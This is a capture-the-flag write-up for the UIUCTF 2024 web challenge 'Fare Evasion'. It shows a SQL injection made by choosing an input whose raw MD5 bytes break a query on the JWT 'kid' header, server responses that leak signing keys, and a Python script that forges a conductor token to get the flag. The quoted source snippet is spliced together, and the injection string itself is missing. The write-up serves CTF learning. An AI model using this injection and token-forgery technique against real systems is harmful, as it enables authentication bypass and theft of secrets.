Tags: web sqlinjection jwt 


# Fare Evasion
SIGPwny Transit Authority needs your fares, but the system is acting a tad odd. We'll let you sign your tickets this time!

## Writeup

async function pay() {
// i could not get sqlite to work on the frontend :(
db.each(`SELECT * FROM keys WHERE kid = '${md5(headerKid)}'`, (err, row) => {
const r = await fetch("/pay", { method: "POST" });
const j = await r.json();
// todo: convert md5 to hex string instead of latin1??
document.getElementById("alert").innerText = j["message"];
setTimeout(() => { document.getElementById("alert").classList.remove("opacity-100") }, 5000);

{"message":"Key isn't passenger or conductor. Please sign your own tickets. \nhashed _\bR\u00f2\u001es\u00dcx\u00c9\u00c4\u0002\u00c5\u00b4\u0012\\\u00e4 secret: a_boring_passenger_signing_key_?","success":false}

Send **md5** hash of **RòsÜxÉÄÅ´\ä** string and we will receive:

{"message":"near \"\u00ef\u00deV3Z\u008f\": syntax error","success":false}

We need to construct an md5 that generate a sqli, we can try with this text:


And in the output will appear the conductor key:

{"message":"Sorry passenger, only conductors are allowed right now. Please sign your own tickets. \nhashed \u00f4\u008c\u00f7u\u009e\u00deIB\u0090\u0005\u0084\u009fB\u00e7\u00d9+ secret: conductor_key_873affdf8cc36a592ec790fc62973d55f4bf43b321bf1ccc0514063370356d5cddb4363b4786fd072d36a25e0ab60a78b8df01bd396c7a05cccbbb3733ae3f8e\nhashed _\bR\u00f2\u001es\u00dcx\u00c9\u00c4\u0002\u00c5\u00b4\u0012\\\u00e4 secret: a_boring_passenger_signing_key_?","success":false}

We can now use it to take the flag:

import requests
import jwt
import hashlib

url = f'https://fare-evasion.chal.uiuc.tf'

def pay(s, encoded_jwt):
req = s.post(url + '/pay', cookies = {'access_token': encoded_jwt})
return req.text

if __name__ == '__main__':
s = requests.Session()
passenger_secret = "a_boring_passenger_signing_key_?"
hashed = 'DyrhGOYP0vxI2DtH8y' # https://github.com/gen0cide/hasherbasher
conductor_secret = 'conductor_key_873affdf8cc36a592ec790fc62973d55f4bf43b321bf1ccc0514063370356d5cddb4363b4786fd072d36a25e0ab60a78b8df01bd396c7a05cccbbb3733ae3f8e'

secret = conductor_secret
encoded_jwt = jwt.encode({'type': 'conductor'}, secret, algorithm="HS256", headers={'kid': hashed})

print(pay(s, encoded_jwt))

The flag is:

{"message":"Conductor override success. uiuctf{sigpwny_does_not_condone_turnstile_hopping!}","success":true}

Original writeup (https://github.com/MicheleMosca/CTF/blob/main/UIUCTF2024/web/Fare%20Evasion/README.md).